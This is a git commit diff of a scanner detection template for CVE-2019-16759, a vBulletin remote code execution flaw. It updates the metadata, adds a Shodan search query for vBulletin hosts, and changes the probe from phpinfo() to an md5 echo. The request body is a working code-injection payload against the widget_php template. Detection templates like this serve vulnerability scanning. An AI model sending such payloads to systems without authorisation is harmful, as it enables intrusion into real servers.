Update CVE-2019-16759.yaml

patch-1
Prince Chaddha 2022-11-02 19:02:46 +05:30 committed by GitHub
parent 0ab97b9f72
commit bf1c0fcfaa
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 10 additions and 7 deletions

View File

@ -15,7 +15,10 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-16759
cwe-id: CWE-94
tags: rce,kev,seclists,cve,cve2019,vbulletin
metadata:
verified: true
shodan-query: http.component:"vBulletin"
tags: cve,cve2019,rce,kev,seclists,vbulletin
requests:
- raw:
@ -24,15 +27,15 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B
matchers-condition: and
matchers:
- type: word
words:
- "addcc9f9f2f40e2e6aca3079b73d9d17"
- type: status
status:
- 200
- type: word
words:
- "PHP Version"
# Enhanced by mp on 2022/03/29